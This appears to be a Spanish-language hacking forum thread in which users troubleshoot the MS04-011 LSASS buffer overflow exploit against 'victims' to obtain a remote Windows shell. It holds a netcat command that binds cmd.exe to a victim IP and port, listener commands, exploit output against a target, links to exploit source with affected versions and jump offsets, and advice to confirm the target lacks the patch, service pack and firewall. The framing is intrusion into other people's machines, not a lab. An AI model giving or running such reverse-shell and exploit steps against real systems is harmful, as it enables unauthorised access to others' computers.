Primero debes poner en escucha el nc y luego ejecutar el exploit para q te devuelva la shell al puerto en escucha del connectback IP. Lo estás haciendo al revés.

Prueba otro puerto q no sea 445 o 139, ya q normalmente Windows ya los tiene ocupados por defecto para el protocolo NetBIOS. Si utlizas esos puertos pq piensas q así la víctima no notará conexiones por puertos raros te equivocas. El puerto 445 es el puerto destino de tu IP, el puerto origen de la víctima será "medioaleatorio"...

Pues claro q no te deja poner en el nc en escucha en el puerto 445!!


No ves q el puerto ya esta siendo utilizado por el protocolo NetBIOS?? Prueba con otro puerto q no esté en uso...

HOLA ATODOS
EL PROBLEMA ES EL SIGUIENTE:
BUENO UTILIZO ELC:\HOD-ms04011-lsasrv-expl.exe EXPLOIT
Y QUE DICE ATAKING OK
PERO LUEGO AL INTENTAR CONECTARME NO SE CONECTA QUE PUEDO HACER; ADEMAS E INTENTADO DEJAR AL NC AL ESCUCHA EN EL PORT 6000 Y NO APARECE NADA  LUEGO AL VER SI FUNCIONO EL EXPLOIT

[tr]nc -vv -e cmd.exe ipvictima  6000[/tr]

y muestra lo siguiente:
nombremaquina ip purto <?> timedout

si no estoy mal hay esta a la escucha?
pero como me concto

psdta: ya intente con dejar el nc a la escucha y directamente

en si cual es el problema

Puse a la escucha el nc en el puerto 800
nc -l -p 800 -vv
y tire el exploit de la siguiente manera
lsass 0 xxx.xxx.xxx.xxx
y me sale

• Target: Ip: xxx.xxx.xxx.xxx:OS: Winxp Professional [universal] lsass.exe
• connecting to xxx.xxx.xxx.xxx ... OK
• Attacking ... OK

pero no me devuelve la shell... tengo que especificar cuando ataco con el lsass a que puerto me lo tiene que devolver?? asi probe tambien pero me da lo mismo y no me aparece nada

Gracias pero el xploit que tengo solo me dice que ponga (so) y (ip) ya probe de la otra manera no esta parcheado

Toda la información q necesitas está aquí:

[!] MS04-011: Windows LSASRV.DLL RPC Buffer Overflow

+ lsass @ http://www.k-otik.com/exploits/04252004.ms04011lsass.c.php
- WINDOWS 2000 SP4 / WINDOWS XP SP0, SP1
- Shell Remota para WINDOWS 2000 SP4 / DoS para WINDOWS XP SP0 / Shell Remota para WINDOWS XP SP1
- Offset WINDOWS 2000: JMP EBX @ netrap.dll (w/ findjmp)
  Offset WINDOWS XP: JMP ESP @ lsass.exe (w/ findjmp)

- http://foro.elhacker.net/index.php/topic,30260.0

+ houseofdabus @ http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php
- WINDOWS 2000 SP4 / WINDOWS XP SP0, SP1
- Shell Remota para WINDOWS 2000 SP4 / DoS para WINDOWS XP SP0 / Shell Remota para WINDOWS XP SP1
- Offset WINDOWS 2000: JMP EBX @ netrap.dll (w/ findjmp)
  Offset WINDOWS XP: JMP ESP @ lsass.exe (w/ findjmp)

Nada de pedir ejecutables, compila el código de k-otik q funciona seguro. Sigue las instrucciones q vienen comentadas al principio de cada exploit. Antes de lanzar el exploit, comprueba q la víctima es vulnerable: es decir, no tiene parche de Ms04-011 (sasser), no tiene SP2, no tiene firewall, etc.